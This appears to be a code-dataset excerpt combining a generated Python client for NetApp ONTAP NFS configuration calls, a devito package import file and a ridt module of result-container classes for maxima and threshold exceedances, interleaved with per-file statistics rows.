'nfsv4x_session_num_slots': [ nfsv4x_session_num_slots, 'nfsv4x-session-num-slots', [ int, 'None' ], False ],
'enable_ejukebox': [ enable_ejukebox, 'enable-ejukebox', [ bool, 'None' ], False ],
'nfsv4x_session_slot_reply_cache_size': [ nfsv4x_session_slot_reply_cache_size, 'nfsv4x-session-slot-reply-cache-size', [ int, 'None' ], False ],
'rpcsec_ctx_high': [ rpcsec_ctx_high, 'rpcsec-ctx-high', [ int, 'None' ], False ],
'is_nfsv41_read_delegation_enabled': [ is_nfsv41_read_delegation_enabled, 'is-nfsv41-read-delegation-enabled', [ bool, 'None' ], False ],
'is_vstorage_enabled': [ is_vstorage_enabled, 'is-vstorage-enabled', [ bool, 'None' ], False ],
'is_nfsv3_fsid_change_enabled': [ is_nfsv3_fsid_change_enabled, 'is-nfsv3-fsid-change-enabled', [ bool, 'None' ], False ],
'nfsv4_grace_seconds': [ nfsv4_grace_seconds, 'nfsv4-grace-seconds', [ int, 'None' ], False ],
'nfsv4_lease_seconds': [ nfsv4_lease_seconds, 'nfsv4-lease-seconds', [ int, 'None' ], False ],
'return_record': [ return_record, 'return-record', [ bool, 'None' ], False ],
'is_nfsv41_write_delegation_enabled': [ is_nfsv41_write_delegation_enabled, 'is-nfsv41-write-delegation-enabled', [ bool, 'None' ], False ],
'is_nfsv41_migration_enabled': [ is_nfsv41_migration_enabled, 'is-nfsv41-migration-enabled', [ bool, 'None' ], False ],
'is_validate_qtree_export_enabled': [ is_validate_qtree_export_enabled, 'is-validate-qtree-export-enabled', [ bool, 'None' ], False ],
'is_nfsv41_enabled': [ is_nfsv41_enabled, 'is-nfsv41-enabled', [ bool, 'None' ], False ],
'is_nfsv40_enabled': [ is_nfsv40_enabled, 'is-nfsv40-enabled', [ bool, 'None' ], False ],
'default_windows_group': [ default_windows_group, 'default-windows-group', [ basestring, 'None' ], False ],
'is_nfsv41_state_protection_enabled': [ is_nfsv41_state_protection_enabled, 'is-nfsv41-state-protection-enabled', [ bool, 'None' ], False ],
}, {
'result': [ NfsInfo, False ],
} )
def nfs_service_destroy(self):
"""
Delete an NFS configuration.
"""
return self.request( "nfs-service-destroy", {
}, {
} )
def nfs_exportfs_flush_cache(self, pathname=None):
"""
For the given path, renew or flush the access cache.
:param pathname: Pathname to flush. If this input is not provided, all of the
paths in the exports table are flushed.
"""
return self.request( "nfs-exportfs-flush-cache", {
'pathname': [ pathname, 'pathname', [ basestring, 'None' ], False ],
}, {
} )
def nfs_exportfs_delete_rules(self, all_pathnames=None, persistent=None, pathnames=None, verbose=None):
"""
Removes the rules for a set of pathnames. This returns an error
if any of the pathnames don't have a rule.
In the Data ONTAP 7-Mode, set the persistent option to modify
the etc/exports file and keep this change persistent upon
reboots whereas it must be true in Data ONTAP Cluster-Mode
as the export entries are always persistent.
:param all_pathnames: Default value is false. Set to true to delete all rules.
'pathnames' option must be left empty if this option is true.
:param persistent: In Data ONTAP 7-Mode, default value is false. Modify
the etc/exports file to delete the rules permanently.
CAUTION: If 'all-pathnames' and 'persistent' are both true,
all exports are removed permanently.
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an error will be
returned.
:param pathnames: In the Data ONTAP 7-Mode, these must be the pathnames
to be deleted from the exports table.
In Data ONTAP Cluster-Mode, the junction paths of the
volumes to be unexported must be provided.
:param verbose: Return a verbose output of what occurred. If there is
an error after deleting only a few rules, 'deleted-pathnames'
will return which rules were deleted. Default value is false.
"""
return self.request( "nfs-exportfs-delete-rules", {
'all_pathnames': [ all_pathnames, 'all-pathnames', [ bool, 'None' ], False ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'pathnames': [ pathnames, 'pathnames', [ PathnameInfo, 'None' ], True ],
'verbose': [ verbose, 'verbose', [ bool, 'None' ], False ],
}, {
'unexported-pathnames': [ PathnameInfo, True ],
'deleted-pathnames': [ PathnameInfo, True ],
} )
def nfs_service_get_iter(self, max_records=None, query=None, tag=None, desired_attributes=None):
"""
Iterate over the list of NFS servers.
:param max_records: The maximum number of records to return in this call.
Default: 20
:param query: A query that specifies which objects to return.
A query could be specified on any number of attributes in the NFS
Server object.
All NFS Server objects matching this query up to 'max-records'
will be returned.
:param tag: Specify the tag from the last call.
It is usually not specified for the first call. For subsequent
calls, copy values from the 'next-tag' obtained from the previous
call.
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
available will be returned.
"""
return self.request( "nfs-service-get-iter", {
'max_records': max_records,
'query': [ query, 'query', [ NfsInfo, 'None' ], False ],
'tag': tag,
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NfsInfo, 'None' ], False ],
}, {
'attributes-list': [ NfsInfo, True ],
} )
def nfs_monitor_remove_locks(self, owners):
"""
removes the NFS locks of a specfied process of a specified
client host.
:param owners: List of owners whose locks have to be deleted.
"""
return self.request( "nfs-monitor-remove-locks", {
'owners': [ owners, 'owners', [ OwnerInfo, 'None' ], True ],
}, {
} )
def nfs_enable(self):
"""
In Data ONTAP 7-Mode, this API will enable NFS server
access (effectively same as the CLI command "nfs on")
In Data ONTAP Cluster-Mode, this will start the Vserver's
NFS service. If the NFS service was not explicitly created,
this API will create one with default options.
"""
return self.request( "nfs-enable", {
}, {
} )
def nfs_stats_top_clients_list_iter_end(self, tag):
"""
Terminate NFS client statistics iteration and cleanup any
saved info.
:param tag: Tag from a previous nfs-stats-top-clients-list-iter-start
"""
return self.request( "nfs-stats-top-clients-list-iter-end", {
'tag': tag,
}, {
} )
def nfs_exportfs_list_rules_2(self, pathname=None, persistent=None):
"""
Returns the rules associated with exports, using the new
security info structure. If a pathname is specified,
the rules associated with the export matching that
pathname, are returned; otherwise, rules for all exports
are returned.
:param pathname: The pathname, for whose matching export, the client wants
a listing of the associated rules. If this parameter is
provided, the persistent parameter is ignored.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true,
the export entries that are present in the /etc/exports file
are returned; otherwise, those loaded in memory are returned.
This parameter is ignored, if the pathname parameter is
provided.
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an empty list
will be returned.
"""
return self.request( "nfs-exportfs-list-rules-2", {
'pathname': [ pathname, 'pathname', [ basestring, 'None' ], False ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
}, {
'rules': [ ExportsRuleInfo2, True ],
} )
def nfs_service_modify(self, is_nfsv3_connection_drop_enabled=None, is_nfsv3_enabled=None, default_windows_user=None, is_nfsv41_acl_preserve_enabled=None, is_nfsv40_referrals_enabled=None, is_nfsv41_pnfs_enabled=None, is_nfsv40_migration_enabled=None, chown_mode=None, is_nfsv41_referrals_enabled=None, nfsv41_implementation_id_domain=None, nfsv41_implementation_id_name=None, is_nfsv4_numeric_ids_enabled=None, is_nfsv40_acl_enabled=None, is_nfs_access_enabled=None, rpcsec_ctx_idle=None, is_nfsv2_enabled=None, nfsv4_acl_max_aces=None, is_nfsv4_fsid_change_enabled=None, is_nfsv40_req_open_confirm_enabled=None, nfsv4_id_domain=None, is_nfsv40_read_delegation_enabled=None, is_nfs_rootonly_enabled=None, is_nfsv41_pnfs_striped_volumes_enabled=None, nfsv41_implementation_id_time=None, is_nfsv41_acl_enabled=None, is_nfsv40_write_delegation_enabled=None, ntfs_unix_security_ops=None, is_mount_rootonly_enabled=None, nfsv4x_session_num_slots=None, enable_ejukebox=None, nfsv4x_session_slot_reply_cache_size=None, rpcsec_ctx_high=None, is_nfsv41_read_delegation_enabled=None, is_vstorage_enabled=None, is_nfsv3_fsid_change_enabled=None, nfsv4_grace_seconds=None, nfsv4_lease_seconds=None, is_nfsv41_write_delegation_enabled=None, is_nfsv41_migration_enabled=None, is_validate_qtree_export_enabled=None, is_nfsv41_enabled=None, is_nfsv40_enabled=None, default_windows_group=None, is_nfsv41_state_protection_enabled=None):
    """
    Modify an NFS configuration. If no values are given, the NFS
    configuration is not modified.
    :param is_nfsv3_connection_drop_enabled: If 'true', then connection is dropped when an NFSv3 request is
    dropped. Default value is 'true'.
    :param is_nfsv3_enabled: If 'true', then NFS version 3 is enabled. Default value is
    'true'.
    :param default_windows_user: The default windows user for CIFS access.
    :param is_nfsv41_acl_preserve_enabled: If 'true', the NFSv4 server will preserve and modify ACL when
    chmod <mode> is done. Default value is 'true'.
    :param is_nfsv40_referrals_enabled: If 'true', then NFSv4.0 Referrals feature is enabled. Default
    value is 'false'.
    :param is_nfsv41_pnfs_enabled: If 'true', then Parallel NFS support for NFS version 4.1 is
    enabled. Default value is 'true'.
    :param is_nfsv40_migration_enabled: If 'true', then NFSv4.0 Migration feature is enabled. Default
    value is 'false'.
    :param chown_mode: Vserver Change Ownership Mode. Possible values are 'ignore',
    'fail', 'use_export_policy'. If 'use_export_policy' is set,
    export policy option is used. Default value is
    'use_export_policy'.
    Possible values:
    <ul>
    <li> "restricted" ,
    <li> "unrestricted" ,
    <li> "use_export_policy"
    </ul>
    :param is_nfsv41_referrals_enabled: If 'true', then NFSv4.1 Referrals feature is enabled. Default
    value is 'false'.
    :param nfsv41_implementation_id_domain: NFSv4.1 Implementation id domain. Default value is
    'defaultv41impliddomain.com'.
    :param nfsv41_implementation_id_name: NFSv4.1 Implementation id name. Default value is
    'defaultv41implidname'.
    :param is_nfsv4_numeric_ids_enabled: If 'true', then NFSv4 support for Numeric Owner IDs is enabled.
    Default value is 'true'.
    :param is_nfsv40_acl_enabled: If 'true', then NFSv4.0 ACL feature is enabled. Default value is
    'false'.
    :param is_nfs_access_enabled: If 'true',then NFS server access is enabled. Default value is
    'true'.
    :param rpcsec_ctx_idle: Time in seconds before an idle entry in RPCSEC_GSS context cache
    is deleted. Default value is 0.
    :param is_nfsv2_enabled: Starting Data ONTAP 8.2, NFS v2 is no longer supported. Default
    value is 'false'.
    :param nfsv4_acl_max_aces: Maximum Number of ACEs allowed in an ACL. Range is 192 to 1024.
    Default value is 400.
    :param is_nfsv4_fsid_change_enabled: If 'true', then clients see change in FSID as NFSv4 clients
    traverse filesystems. Default value is 'true'.
    :param is_nfsv40_req_open_confirm_enabled: If 'true', then the server will require an OPEN_CONFIRM operation
    for all NFSv4.0 clients. Default value is 'false'.
    :param nfsv4_id_domain: NFSv4 ID mapping domain. Default value is
    'defaultv4iddomain.com'.
    :param is_nfsv40_read_delegation_enabled: If 'true', NFSv4.0 read delegation feature is enabled. Default
    value is 'false'.
    :param is_nfs_rootonly_enabled: If 'true', then the vserver allows NFS protocol calls only from
    privileged ports (port numbers less than 1024). Default value is
    'false'.
    :param is_nfsv41_pnfs_striped_volumes_enabled: If 'true', Striped volume support for Parallel NFS is enabled .
    Default value is 'false'.
    :param nfsv41_implementation_id_time: NFSv4.1 Implementation id time.The number of seconds since
    January 1, 1970.
    :param is_nfsv41_acl_enabled: If 'true', then NFSv4.1 ACL feature is enabled. Default value is
    'false'.
    :param is_nfsv40_write_delegation_enabled: If 'true', NFSv4.0 write delegation feature is enabled. Default
    value is 'false'.
    :param ntfs_unix_security_ops: Ignore/Fail unix security operations on NTFS volumes. Possible
    values are 'ignore', 'fail','use_export_policy'. If
    'use_export_policy' is set, export policy option is used.
    Default value is 'use_export_policy'.
    :param is_mount_rootonly_enabled: If 'true', then the vserver allows MOUNT protocol calls only from
    privileged ports (port numbers less than 1024). Default value is
    'true'.
    :param nfsv4x_session_num_slots: Number of Slots in the NFSv4.x Session Slot Tables. Default value
    is 180.
    :param enable_ejukebox: If 'true', then the NFS server will send EJUKEBOX error on server
    delays.
    :param nfsv4x_session_slot_reply_cache_size: Size of the Reply that will be Cached in Each NFSv4.x Session
    Slot (in bytes). Default value is 640.
    :param rpcsec_ctx_high: High water mark for the RPCSEC_GSS Context Cache. Default value
    is 0.
    :param is_nfsv41_read_delegation_enabled: If 'true', NFSv4.1 read delegation feature is enabled. Default
    value is 'false'.
    :param is_vstorage_enabled: If 'true', then enables the usage of vStorage protocol for server
    side copies, which is mostly used in hypervisors. Default value
    is 'false'.
    :param is_nfsv3_fsid_change_enabled: If 'true', then NFSv3 clients see change in FSID as they traverse
    filesystems. Default value is 'true'.
    :param nfsv4_grace_seconds: NFSv4 Grace timeout value in seconds. Default value is 45
    seconds.
    :param nfsv4_lease_seconds: NFSv4 Lease timeout value in seconds. Default value is 30
    seconds.
    :param is_nfsv41_write_delegation_enabled: If 'true', NFSv4.1 write delegation feature is enabled. Default
    value is 'false'.
    :param is_nfsv41_migration_enabled: If 'true', then NFSv4.1 Migration feature is enabled. Default
    value is 'false'.
    :param is_validate_qtree_export_enabled: If 'true', then the Vserver performs additional validation for
    qtree. Default value is 'true'.
    :param is_nfsv41_enabled: If 'true', then NFS version 4.1 is enabled. Default value is
    'false'.
    :param is_nfsv40_enabled: If 'true', then NFS version 4.0 is enabled. Default value is
    'false'.
    :param default_windows_group: The default windows group for CIFS access.
    :param is_nfsv41_state_protection_enabled: If 'true', then NFS version 4.1 State Protection is enabled. Default
    value is 'true'.
    """
    # Each dict entry maps a python keyword argument to the marshalling
    # spec [value, 'zapi-element-name', [type, subtype-name], is_array]
    # consumed by self.request(), matching the convention used by every
    # other generated method in this class. The element-name strings are
    # part of the on-the-wire ZAPI protocol — do not edit them.
    return self.request( "nfs-service-modify", {
        'is_nfsv3_connection_drop_enabled': [ is_nfsv3_connection_drop_enabled, 'is-nfsv3-connection-drop-enabled', [ bool, 'None' ], False ],
        'is_nfsv3_enabled': [ is_nfsv3_enabled, 'is-nfsv3-enabled', [ bool, 'None' ], False ],
        'default_windows_user': [ default_windows_user, 'default-windows-user', [ basestring, 'None' ], False ],
        'is_nfsv41_acl_preserve_enabled': [ is_nfsv41_acl_preserve_enabled, 'is-nfsv41-acl-preserve-enabled', [ bool, 'None' ], False ],
        'is_nfsv40_referrals_enabled': [ is_nfsv40_referrals_enabled, 'is-nfsv40-referrals-enabled', [ bool, 'None' ], False ],
        'is_nfsv41_pnfs_enabled': [ is_nfsv41_pnfs_enabled, 'is-nfsv41-pnfs-enabled', [ bool, 'None' ], False ],
        'is_nfsv40_migration_enabled': [ is_nfsv40_migration_enabled, 'is-nfsv40-migration-enabled', [ bool, 'None' ], False ],
        'chown_mode': [ chown_mode, 'chown-mode', [ basestring, 'nfschownmode' ], False ],
        'is_nfsv41_referrals_enabled': [ is_nfsv41_referrals_enabled, 'is-nfsv41-referrals-enabled', [ bool, 'None' ], False ],
        'nfsv41_implementation_id_domain': [ nfsv41_implementation_id_domain, 'nfsv41-implementation-id-domain', [ basestring, 'None' ], False ],
        'nfsv41_implementation_id_name': [ nfsv41_implementation_id_name, 'nfsv41-implementation-id-name', [ basestring, 'None' ], False ],
        'is_nfsv4_numeric_ids_enabled': [ is_nfsv4_numeric_ids_enabled, 'is-nfsv4-numeric-ids-enabled', [ bool, 'None' ], False ],
        'is_nfsv40_acl_enabled': [ is_nfsv40_acl_enabled, 'is-nfsv40-acl-enabled', [ bool, 'None' ], False ],
        'is_nfs_access_enabled': [ is_nfs_access_enabled, 'is-nfs-access-enabled', [ bool, 'None' ], False ],
        'rpcsec_ctx_idle': [ rpcsec_ctx_idle, 'rpcsec-ctx-idle', [ int, 'None' ], False ],
        'is_nfsv2_enabled': [ is_nfsv2_enabled, 'is-nfsv2-enabled', [ bool, 'None' ], False ],
        'nfsv4_acl_max_aces': [ nfsv4_acl_max_aces, 'nfsv4-acl-max-aces', [ int, 'None' ], False ],
        'is_nfsv4_fsid_change_enabled': [ is_nfsv4_fsid_change_enabled, 'is-nfsv4-fsid-change-enabled', [ bool, 'None' ], False ],
        'is_nfsv40_req_open_confirm_enabled': [ is_nfsv40_req_open_confirm_enabled, 'is-nfsv40-req-open-confirm-enabled', [ bool, 'None' ], False ],
        'nfsv4_id_domain': [ nfsv4_id_domain, 'nfsv4-id-domain', [ basestring, 'None' ], False ],
        'is_nfsv40_read_delegation_enabled': [ is_nfsv40_read_delegation_enabled, 'is-nfsv40-read-delegation-enabled', [ bool, 'None' ], False ],
        'is_nfs_rootonly_enabled': [ is_nfs_rootonly_enabled, 'is-nfs-rootonly-enabled', [ bool, 'None' ], False ],
        'is_nfsv41_pnfs_striped_volumes_enabled': [ is_nfsv41_pnfs_striped_volumes_enabled, 'is-nfsv41-pnfs-striped-volumes-enabled', [ bool, 'None' ], False ],
        'nfsv41_implementation_id_time': [ nfsv41_implementation_id_time, 'nfsv41-implementation-id-time', [ int, 'date' ], False ],
        'is_nfsv41_acl_enabled': [ is_nfsv41_acl_enabled, 'is-nfsv41-acl-enabled', [ bool, 'None' ], False ],
        'is_nfsv40_write_delegation_enabled': [ is_nfsv40_write_delegation_enabled, 'is-nfsv40-write-delegation-enabled', [ bool, 'None' ], False ],
        'ntfs_unix_security_ops': [ ntfs_unix_security_ops, 'ntfs-unix-security-ops', [ basestring, 'None' ], False ],
        'is_mount_rootonly_enabled': [ is_mount_rootonly_enabled, 'is-mount-rootonly-enabled', [ bool, 'None' ], False ],
        'nfsv4x_session_num_slots': [ nfsv4x_session_num_slots, 'nfsv4x-session-num-slots', [ int, 'None' ], False ],
        'enable_ejukebox': [ enable_ejukebox, 'enable-ejukebox', [ bool, 'None' ], False ],
        'nfsv4x_session_slot_reply_cache_size': [ nfsv4x_session_slot_reply_cache_size, 'nfsv4x-session-slot-reply-cache-size', [ int, 'None' ], False ],
        'rpcsec_ctx_high': [ rpcsec_ctx_high, 'rpcsec-ctx-high', [ int, 'None' ], False ],
        'is_nfsv41_read_delegation_enabled': [ is_nfsv41_read_delegation_enabled, 'is-nfsv41-read-delegation-enabled', [ bool, 'None' ], False ],
        'is_vstorage_enabled': [ is_vstorage_enabled, 'is-vstorage-enabled', [ bool, 'None' ], False ],
        'is_nfsv3_fsid_change_enabled': [ is_nfsv3_fsid_change_enabled, 'is-nfsv3-fsid-change-enabled', [ bool, 'None' ], False ],
        'nfsv4_grace_seconds': [ nfsv4_grace_seconds, 'nfsv4-grace-seconds', [ int, 'None' ], False ],
        'nfsv4_lease_seconds': [ nfsv4_lease_seconds, 'nfsv4-lease-seconds', [ int, 'None' ], False ],
        'is_nfsv41_write_delegation_enabled': [ is_nfsv41_write_delegation_enabled, 'is-nfsv41-write-delegation-enabled', [ bool, 'None' ], False ],
        'is_nfsv41_migration_enabled': [ is_nfsv41_migration_enabled, 'is-nfsv41-migration-enabled', [ bool, 'None' ], False ],
        'is_validate_qtree_export_enabled': [ is_validate_qtree_export_enabled, 'is-validate-qtree-export-enabled', [ bool, 'None' ], False ],
        'is_nfsv41_enabled': [ is_nfsv41_enabled, 'is-nfsv41-enabled', [ bool, 'None' ], False ],
        'is_nfsv40_enabled': [ is_nfsv40_enabled, 'is-nfsv40-enabled', [ bool, 'None' ], False ],
        'default_windows_group': [ default_windows_group, 'default-windows-group', [ basestring, 'None' ], False ],
        'is_nfsv41_state_protection_enabled': [ is_nfsv41_state_protection_enabled, 'is-nfsv41-state-protection-enabled', [ bool, 'None' ], False ],
    }, {
    } )
| 56.451645
| 1,443
| 0.633281
| 6,866
| 56,621
| 5.034227
| 0.075881
| 0.030725
| 0.042124
| 0.032403
| 0.828844
| 0.804542
| 0.786287
| 0.776653
| 0.772573
| 0.757095
| 0
| 0.01889
| 0.278201
| 56,621
| 1,002
| 1,444
| 56.507984
| 0.826861
| 0.465163
| 0
| 0.613924
| 0
| 0
| 0.270324
| 0.158367
| 0
| 0
| 0
| 0
| 0
| 1
| 0.10443
| false
| 0
| 0.063291
| 0
| 0.275316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a4c491572df293e8ca4574594c16161ca4c82b2
| 265
|
py
|
Python
|
devito/finite_differences/__init__.py
|
reguly/devito
|
543b7be41ddbf1faa90224cca3824767756c9390
|
[
"MIT"
] | 204
|
2020-01-09T11:27:58.000Z
|
2022-03-20T22:53:37.000Z
|
devito/finite_differences/__init__.py
|
reguly/devito
|
543b7be41ddbf1faa90224cca3824767756c9390
|
[
"MIT"
] | 949
|
2016-04-25T11:41:34.000Z
|
2019-12-27T10:43:40.000Z
|
devito/finite_differences/__init__.py
|
reguly/devito
|
543b7be41ddbf1faa90224cca3824767756c9390
|
[
"MIT"
] | 131
|
2020-01-08T17:43:13.000Z
|
2022-03-27T11:36:47.000Z
|
from .differentiable import * # noqa
from .elementary import * # noqa
from .finite_difference import * # noqa
from .derivative import * # noqa
from .tools import generate_fd_shortcuts # noqa
from .coefficients import * # noqa
from .operators import * # noqa
| 33.125
| 48
| 0.739623
| 32
| 265
| 6.03125
| 0.4375
| 0.310881
| 0.362694
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184906
| 265
| 7
| 49
| 37.857143
| 0.893519
| 0.128302
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
43550d00c86d9c4cb941c9a841dccbf3535e8e25
| 16,110
|
py
|
Python
|
ridt/analysis/resultcontainers.py
|
riskaware-ltd/ridt
|
c0288a2f814b2749bdf73de7157f7477ca271aff
|
[
"MIT"
] | null | null | null |
ridt/analysis/resultcontainers.py
|
riskaware-ltd/ridt
|
c0288a2f814b2749bdf73de7157f7477ca271aff
|
[
"MIT"
] | 9
|
2020-09-18T08:22:39.000Z
|
2021-07-20T09:39:59.000Z
|
ridt/analysis/resultcontainers.py
|
riskaware-ltd/ridt
|
c0288a2f814b2749bdf73de7157f7477ca271aff
|
[
"MIT"
] | 1
|
2021-06-22T21:53:20.000Z
|
2021-06-22T21:53:20.000Z
|
from typing import Tuple
from ridt.container import Domain
from ridt.config import RIDTConfig
from ridt.config import Units
class ResultContainer:
    """Common state shared by all result container types.

    Attributes
    ----------
    setting : :class:`~.RIDTConfig`
        The settings for the run in question.
    geometry : :obj:`str`
        The geometry domain this result corresponds to.
    id : :obj:`str`
        The id of the domain this result corresponds to.
    domain : :class:`~.Domain`
        The instance of :class:`~.Domain` corresponding to :attr:`setting`.
    quantity : :obj:`str`
        The string id for the quantity stored in the data store.
    units : :class:`~.Units`
        The instance of :class:`~.Units` corresponding to :attr:`setting`.
    """

    def __init__(self, setting: RIDTConfig, geometry: str, id: str, quantity: str):
        # Store the raw configuration plus derived unit/domain helpers.
        self.setting = setting
        self.geometry = geometry
        self.id = id
        self.quantity = quantity
        self.units = Units(setting)
        self.domain = Domain(setting)

    def same_geometry(self, other):
        """Raise if *other* was computed over a different geometry.

        Parameters
        ----------
        other
            The comparative item.

        Raises
        ------
        :obj:`ValueError`
            if the :attr:`geometry` attributes are different.
        """
        if self.geometry != other.geometry:
            raise ValueError("You are comparing two different geometries.")

    @property
    def unit(self):
        """:obj:`str` : The units corresponding to :attr:`quantity`."""
        # `quantity` is documented as :obj:`str`, so the attribute name
        # can be used directly as the lookup key on the units object.
        return getattr(self.units, self.quantity)
class Maximum(ResultContainer):
    """Result container for the max value in a domain.

    Attributes
    ----------
    index : Tuple[:obj:`int`]
        The index in the array where the maximum occurred.
    value : :obj:`float`
        The value of the maximum.
    """
    def __init__(self,
                 setting: RIDTConfig,
                 geometry: str,
                 id: str,
                 quantity: str,
                 index: Tuple[int],
                 value: float):
        """The Maximum class initialiser

        Parameters
        ----------
        setting : :class:`~.RIDTConfig`
            The settings for the run in question.
        geometry : :obj:`str`
            The geometry domain this result corresponds to.
        id : :obj:`str`
            The id of the domain this result corresponds to.
        quantity : :obj:`str`
            The string id for the quantity stored in the data store.
        index : Tuple[:obj:`int`]
            The index in the array where the maximum occurred.
        value : :obj:`float`
            The value of the maximum.
        """
        super().__init__(setting, geometry, id, quantity)
        self.index = index
        self.value = value

    def __lt__(self, other):
        """Order :class:`Maximum` instances by their :attr:`value`."""
        if not isinstance(other, Maximum):
            raise TypeError(
                f"< not supported between instances of {Maximum} and {type(other)}")
        self.same_geometry(other)
        # The comparison already yields a bool; no ternary needed.
        return self.value < other.value

    @property
    def string(self):
        """:obj:`str` : The string representation of the result.
        """
        u = getattr(self.units, f"{self.quantity}")
        factor = getattr(self.units, f"{self.quantity}_factor")
        rv = str()
        if self.index:
            t, x, y, z = self.domain.values(self.id, self.index)
            rv += f"id: {self.id}\n"
            rv += f"time: {t:.2f}{self.units.time}\n"
            rv += f"x: {x:.2f}{self.units.space}\n"
            rv += f"y: {y:.2f}{self.units.space}\n"
            rv += f"z: {z:.2f}{self.units.space}\n"
            rv += f"value: {self.value / factor:.2e}{u}\n\n"
        else:
            rv += "None\n\n"
        return rv

    @property
    def header(self):
        """:obj:`list` [:obj:`str`] : The list of headers for a csv output.
        """
        return [
            "id",
            f"time ({self.units.time})",
            f"x ({self.units.space})",
            f"y ({self.units.space})",
            f"z ({self.units.space})",
            f"value ({self.unit})"
        ]

    @property
    def row(self):
        """:obj:`list` [:obj:`float`] : The list of values for a csv output.
        """
        factor = getattr(self.units, f"{self.quantity}_factor")
        if self.index:
            t, x, y, z = self.domain.values(self.id, self.index)
            return [self.id, t, x, y, z, self.value / factor]
        else:
            # BUG FIX: the original returned only five entries here, one
            # short of the six-column header, misaligning the csv output.
            return [self.id, "None", "None", "None", "None", "None"]

    @property
    def fname(self):
        """:obj:`str` : the file name for the this result output.
        """
        return f"{self.geometry}_maximums.csv"

    @property
    def title(self):
        """:obj:`str` : the title string for this result.
        """
        return "Maxima"

    @property
    def extreme_title(self):
        """:obj:`str` : the extremum version of the title for this result.
        """
        return f"Maximum value for {self.geometry}:"

    @property
    def valid(self):
        """:obj:`bool` : Returns true if contains valid index, else false.
        """
        # BUG FIX: the original compared the float `value` against the
        # string "nan", which is never equal for a float, so NaN maxima
        # were always reported valid. NaN is the only value unequal to
        # itself, so `value == value` is a dependency-free NaN check.
        return bool(self.index) and self.value == self.value
class Exceedance(ResultContainer):
    """Result container for the threshold exceedance in a domain.

    Attributes
    ----------
    index : Tuple[:obj:`int`]
        The index in the array where the exceedance occurred.
    threshold : :obj:`float`
        The threshold that was exceeded.
    """
    def __init__(self,
                 setting: RIDTConfig,
                 geometry: str,
                 id: str,
                 quantity: str,
                 index: Tuple[int],
                 threshold: float):
        """The Exceedance class initialiser

        Parameters
        ----------
        setting : :class:`~.RIDTConfig`
            The settings for the run in question.
        geometry : :obj:`str`
            The geometry domain this result corresponds to.
        id : :obj:`str`
            The id of the domain this result corresponds to.
        quantity : :obj:`str`
            The string id for the quantity stored in the data store.
        index : Tuple[:obj:`int`]
            The index in the array where the exceedance occurred.
        threshold : :obj:`float`
            The threshold that was exceeded.
        """
        super().__init__(setting, geometry, id, quantity)
        self.threshold = threshold
        self.index = index

    def __lt__(self, other):
        """Order :class:`Exceedance` instances by time index (index[0])."""
        if not isinstance(other, Exceedance):
            raise TypeError(
                f"< not supported between instances of {Exceedance} and {type(other)}")
        self.same_geometry(other)
        return self.index[0] < other.index[0]

    @property
    def string(self):
        """:obj:`str` : The string representation of the result.
        """
        rv = str()
        if self.index:
            t, x, y, z = self.domain.values(self.id, self.index)
            rv += f"id: {self.id}\n"
            rv += f"time: {t:.2f}{self.units.time}\n"
            rv += f"x: {x:.2f}{self.units.space}\n"
            rv += f"y: {y:.2f}{self.units.space}\n"
            rv += f"z: {z:.2f}{self.units.space}\n"
        else:
            rv += "None\n\n"
        return rv

    @property
    def header(self):
        """:obj:`list` [:obj:`str`] : The list of headers for a csv output.
        """
        return [
            "id",
            f"time ({self.units.time})",
            f"x ({self.units.space})",
            f"y ({self.units.space})",
            f"z ({self.units.space})",
        ]

    @property
    def row(self):
        """:obj:`list` [:obj:`float`] : The list of values for a csv output.
        """
        if self.index:
            t, x, y, z = self.domain.values(self.id, self.index)
            return [self.id, t, x, y, z]
        else:
            # BUG FIX: the original returned only four entries here, one
            # short of the five-column header, misaligning the csv output.
            return [self.id, "None", "None", "None", "None"]

    @property
    def fname(self):
        """:obj:`str` : the file name for the this result output.
        """
        return f"{self.geometry}_exceeds_{self.threshold}{self.unit}.csv"

    @property
    def title(self):
        """:obj:`str` : the title string for this result.
        """
        return "Threshold Exceedance"

    @property
    def extreme_title(self):
        """:obj:`str` : the extremum version of the title for this result.
        """
        return f"Minimum time to {self.threshold}{self.unit} for {self.geometry}:"

    @property
    def valid(self):
        """:obj:`bool` : Returns true if contains valid index, else false.
        """
        return bool(self.index)
class PercentExceedance(ResultContainer):
    """Result container for the percent threshold exceedance in a domain.

    Attributes
    ----------
    index : :obj:`int`
        The time index in the array where the exceedance occurred.
    threshold : :obj:`float`
        The threshold that was exceeded.
    percent : :obj:`float`
        The percentage by which the threshold was exceeded
    """
    def __init__(self,
                 setting: RIDTConfig,
                 geometry: str,
                 id: str,
                 quantity: str,
                 index: int,
                 threshold: float,
                 percent: float):
        """The PercentExceedance class initialiser

        Parameters
        ----------
        setting : :class:`~.RIDTConfig`
            The settings for the run in question.
        geometry : :obj:`str`
            The geometry domain this result corresponds to.
        id : :obj:`str`
            The id of the domain this result corresponds to.
        quantity : :obj:`str`
            The string id for the quantity stored in the data store.
        index : :obj:`int`
            The time index in the array where the exceedance occurred.
        threshold : :obj:`float`
            The threshold that was exceeded.
        percent : :obj:`float`
            The percentage by which the threshold was exceeded
        """
        super().__init__(setting, geometry, id, quantity)
        self.threshold = threshold
        self.index = index
        self.percent = percent

